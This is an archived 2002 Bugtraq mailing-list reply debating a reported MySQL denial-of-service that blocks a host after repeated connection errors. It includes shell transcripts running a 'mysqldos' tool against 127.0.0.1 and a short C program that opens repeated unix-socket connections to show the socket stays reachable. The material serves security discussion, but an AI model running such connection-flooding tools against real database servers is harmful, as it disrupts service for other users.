Bugtraq mailing list archives
Re: [luca.ercoli () inwind it: DoS against mysqld]
From: Simone Piunno <pioppo () ferrara linux it>
Date: Fri, 23 Aug 2002 21:18:34 +0200
Several people reported that on a typical small shared web server with mysql on localhost, a single user could DoS other co-hosted users, but they are wrong because you can always connect mysqld on localhost via the unix socket (actually this is the default and the better way... I can't see why someone should prefer TCP). Proof of concept: [pioppo@liston pioppo]$ mysql -h 127.0.0.1 Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 1 to server version: 3.23.47 Type 'help;' or '\h' for help. Type '\c' to clear the buffer. mysql> exit Bye [pioppo@liston pioppo]$ ./mysqldos -h 127.0.0.1 Sending dos ............... [pioppo@liston pioppo]$ mysql -h 127.0.0.1 ERROR 1129: Host 'localhost.localdomain' is blocked because of many connection errors. Unblock with 'mysqladmin flush-hosts' [pioppo@liston pioppo]$ mysql -h localhost Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 21 to server version: 3.23.47 Type 'help;' or '\h' for help. Type '\c' to clear the buffer. mysql> TCP connections from localhost are blocked, but who cares? Well educated clients don't use TCP to connect to localhost and the unix socket is not blocked. Now, can we DoS the unix socket? No [pioppo@liston pioppo]$ cat mysqlunix.c #include <sys/types.h> #include <sys/socket.h> #include <sys/un.h> #include <unistd.h> #define SOCK "/var/lib/mysql/mysql.sock" int main(int argc, char *argv[]){ int sk; int i; int rc; struct sockaddr_un sun; sun.sun_family = AF_UNIX; strcpy(sun.sun_path, SOCK); printf("Sending dos on the unix socket "); for (i = 0; i < 15; i++) { sk = socket(PF_UNIX, SOCK_STREAM, 0); if (sk < 0) { perror("socket"); exit(1); } rc = connect(sk, (struct sockaddr *)&sun, sizeof(sun)); if (rc < 0) { perror("connect"); exit(1); } printf("."); close(sk); } printf("\n"); return 1; } [pioppo@liston pioppo]$ make mysqlunix cc mysqlunix.c -o mysqlunix [pioppo@liston pioppo]$ ./mysqlunix Sending dos on the unix socket ............... [pioppo@liston pioppo]$ mysql -h localhost Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 56 to server version: 3.23.47 Type 'help;' or '\h' for help. Type '\c' to clear the buffer. mysql> I think the only real concern is the one proposed by Andreas Gietl:
The only Situation this can really DOS a service i can imagine is a shared hosting-environment with a central mysql-server on a remote box.
agreed, but again I can't see anything wrong in this. Not blocking the offender would cause thread exaustion very soon, and this would be a much worse problem: a DoS against ALL clients. -- Adde parvum parvo magnus acervus erit. Simone Piunno, FerraraLUG - http://members.ferrara.linux.it/pioppo
Attachment:
_bin
Description:
Current thread:
- [luca.ercoli () inwind it: DoS against mysqld] Simone Piunno (Aug 23)
- Re: [luca.ercoli () inwind it: DoS against mysqld] bda (Aug 23)
- Re: [luca.ercoli () inwind it: DoS against mysqld] Rich Lafferty (Aug 23)
- Message not available
- Re: [luca.ercoli () inwind it: DoS against mysqld] Simone Piunno (Aug 23)